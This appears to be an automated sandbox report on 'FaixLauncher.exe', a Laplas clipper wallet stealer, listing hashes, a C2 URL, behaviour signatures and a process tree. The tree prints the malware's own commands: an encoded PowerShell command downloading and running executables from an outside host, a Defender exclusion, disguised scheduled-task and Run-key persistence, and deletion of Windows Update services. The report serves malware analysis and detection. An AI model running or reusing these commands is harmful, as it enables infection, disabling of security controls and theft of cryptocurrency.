Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
-
submitted
04/02/2023, 22:26
General
-
Target
FaixLauncher.exe
-
Size
162KB
-
MD5
dd7f2b45c9537ee59a5f03e5b01a5132
-
SHA1
da5e55a244b5b0131593dc4a4943223d4e7c290f
-
SHA256
00310dcf38e02d26825864a4e969ba7be64ffe87c840f9708265d5e51c00bd20
-
SHA512
90985c14ddb2adc072943a663382ab95f3a8df7b26b7bd17d587a66eb8a3a7a3f5ef9892716b60445cd7f7a8e004cfe84f9e3f0257ea782938343ae8779b2341
-
SSDEEP
3072:YenRWXDQKT/BeL0XMiFX/SFKE7iHdUX5F3OqbCpb:sDf/BCsMGP+KE7KSHRb
Score
10/10
Malware Config
Extracted
Family
laplas
C2
http://clipper.guru
Attributes
-
api_key
5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e
Signatures
-
Laplas Clipper
Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.
-
Modifies security service 2 TTPs 5 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in Program Files directory 1 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\FaixLauncher.exe"C:\Users\Admin\AppData\Local\Temp\FaixLauncher.exe"2⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdgBjACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGQAcwBsACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBNAC8AVgBQAFMAIABhAGwAbABvAHcAZQBkACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHkAdwBrACMAPgA7ACIAOwA8ACMAegB3AHcAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwByAGgAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBkAGIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBrAGQAaQAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGUAYQBzAHkAZgBmAGYAZgBmAGYALwBhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZAAvAHIAYQB3AC8AOQA2AGUAYQBjADAAMgBhAGMAYwA0AGIAZAA4ADMAOQAwADcAMgBjAGUAZABkADUAMAA4AGQANgAzADAAYwA2AGUAMgAzAGUAOQBkADMANAAvAGIAcgB2ADIALgBlAHgAZQAnACwAIAA8ACMAbABkAGUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBsAGIAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB1AHAAbgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBIAG8AcwB0AC4AZQB4AGUAJwApACkAPAAjAHEAaAB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBlAGEAcwB5AGYAZgBmAGYAZgBmAC8AYQBzAGQAYQBzAGQAYQBzAGQAYQBzAGQAYQBzAGQAYQBzAGQAYQBzAGQAYQBzAGQAYQBzAGQAYQBzAGQAYQBzAGQAYQBzAGQAYQBzAGQALwByAGEAdwAvADkANgBlAGEAYwAwADIAYQBjAGMANABiAGQAOAAzADkAMAA3ADIAYwBlAGQAZAA1ADAAOABkADYAMwAwAGMANgBlADIAMwBlADkAZAAzADQALwBsAG0ALgBlAHgAZQAnACwAIAA8ACMAcQBjAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAGsAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwByAGIAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAE0AUwBDAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAdQBmAHIAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGUAYQBzAHkAZgBmAGYAZgBmAGYALwBhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZAAvAHIAYQB3AC8AOQA2AGUAYQBjADAAMgBhAGMAYwA0AGIAZAA4ADMAOQAwADcAMgBjAGUAZABkADUAMAA4AGQANgAzADAAYwA2AGUAMgAzAGUAOQBkADMANAAvAGwAZQBtAG8AbgAuAGUAeABlACcALAAgADwAIwBpAG0AawAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHoAdAB4ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAG0AdABmACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAEMAaABlAGMAawAuAGUAeABlACcAKQApADwAIwBtAHgAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAG0AdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAegBiAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwB5AHMASABvAHMAdAAuAGUAeABlACcAKQA8ACMAYgB1AGEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYQBhAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGMAcQBmACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwATQBTAEMAaABlAGMAawAuAGUAeABlACcAKQA8ACMAZgB4AGkAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwB3AGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHIAbABxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAEMAaABlAGMAawAuAGUAeABlACcAKQA8ACMAeQBkAG0AIwA+AA=="3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#dsl#>[System.Windows.Forms.MessageBox]::Show('No VM/VPS allowed!','','OK','Error')<#ywk#>;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\SysHost.exe"C:\Users\Admin\AppData\Roaming\SysHost.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C schtasks /create /tn \XgKocxNybk /tr "C:\Users\Admin\AppData\Roaming\XgKocxNybk\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f5⤵
- Suspicious use of WriteProcessMemory
-
-
-
C:\Users\Admin\AppData\Roaming\LMSCheck.exe"C:\Users\Admin\AppData\Roaming\LMSCheck.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\LicCheck.exe"C:\Users\Admin\AppData\Local\Temp\LicCheck.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ssfng#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTask' /tr '''C:\Program Files\Google\Chrome\updatert.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updatert.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTask' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTask" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updatert.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7fffc7644f50,0x7fffc7644f60,0x7fffc7644f703⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1660 /prefetch:23⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2012 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2336 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2976 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3052 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3828 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4508 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4424 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4764 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4744 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4916 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5136 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5280 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5316 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5460 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5488 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3640 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1572 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2640 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2384 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3296 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:13⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1172 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5788 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,11154687848868424371,2598277283841030350,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=912 /prefetch:83⤵
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn \XgKocxNybk /tr "C:\Users\Admin\AppData\Roaming\XgKocxNybk\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f1⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\XgKocxNybk\svcupdater.exeC:\Users\Admin\AppData\Roaming\XgKocxNybk\svcupdater.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5614f88cf39eb3223246afec4bf1463b4
SHA174d738ee6fdada75ac1ef1645073005e3f6b6cfb
SHA256021636a793f57f23b16356c5b84fdf0122fdcadfaba305e4df4654bfbfa442bd
SHA51284a7151e0471e659699a15c25d9063af1975e79bb5f23de6b3bc0d3b96cd161d70ad35f6acdbc8123b38bac9918df8b202bd6f1f4ca8061919074973e6063a77
-
Filesize
1KB
MD5790cd8b15a4a5347dd058c86c38bc6c0
SHA16098b09cfa23f15b3749f076c0eb6d44228803b8
SHA256080187e7d5c8cda08f011f39afc165a294c716acf8f26bc7de1b41beac86c0bc
SHA5123b9a1ff4eb12cdf9c55ce1dc158c16744f5ed6f2938cf9200096592b45b15ae33d120997b5e63d7405865c87e60ca337032d03c5da103f40cbdd580a88ba136e
-
Filesize
1KB
MD5790cd8b15a4a5347dd058c86c38bc6c0
SHA16098b09cfa23f15b3749f076c0eb6d44228803b8
SHA256080187e7d5c8cda08f011f39afc165a294c716acf8f26bc7de1b41beac86c0bc
SHA5123b9a1ff4eb12cdf9c55ce1dc158c16744f5ed6f2938cf9200096592b45b15ae33d120997b5e63d7405865c87e60ca337032d03c5da103f40cbdd580a88ba136e
-
Filesize
944B
MD5a57816f0c8b0f9bae1f626e6e346eb32
